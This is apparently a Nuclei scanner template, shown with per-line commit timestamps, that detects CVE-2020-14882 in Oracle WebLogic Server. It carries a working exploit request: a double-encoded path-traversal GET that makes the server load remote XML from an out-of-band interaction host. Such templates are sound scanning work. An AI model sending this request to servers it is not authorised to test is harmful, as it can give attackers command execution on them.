2021-01-02 04:56:15 +00:00
id : CVE-2020-14882
2020-11-02 07:23:12 +00:00
info :
2022-04-29 19:58:07 +00:00
name : Oracle Weblogic Server - Remote Command Execution
2020-11-02 07:23:12 +00:00
author : dwisiswant0
severity : critical
2022-04-29 19:58:07 +00:00
description : Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the affected application.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the latest security patches provided by Oracle to fix the vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-03-11 15:26:35 +00:00
- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
2022-02-04 19:29:39 +00:00
- https://www.oracle.com/security-alerts/cpuoct2020.html
2021-03-11 15:26:35 +00:00
- https://twitter.com/jas502n/status/1321416053050667009
- https://youtu.be/JFVDOIL0YtA
- https://github.com/jas502n/CVE-2020-14882#eg
2022-04-29 19:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-14882
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-14882
2024-04-08 11:34:33 +00:00
epss-score : 0.9739
epss-percentile : 0.99906
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : oracle
product : weblogic_server
2024-01-14 09:21:50 +00:00
tags : cve2020,cve,oracle,rce,weblogic,oast,kev
2020-11-02 07:23:12 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-09 14:52:22 +00:00
- method : GET
path :
- "{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"
2021-08-22 18:09:33 +00:00
2020-11-02 07:23:12 +00:00
matchers-condition : and
matchers :
2021-11-28 19:45:05 +00:00
- type : word
part : header
words :
- "ADMINCONSOLESESSION"
2021-09-12 14:52:03 +00:00
2021-11-28 19:45:05 +00:00
- type : word
part : interactsh_protocol
words :
2022-02-04 19:29:39 +00:00
- "http"
2024-01-26 08:31:11 +00:00
# digest: 4a0a0047304502210095d334a35f712502dc1161437a7636b7816e79ffa45dee8b16943efbfa63e27e022060fcc3b18130248421a20581edc7d0a8925ec9748890b716418f0e3975cddb70:922c64590222798bb761d5b6d8e72950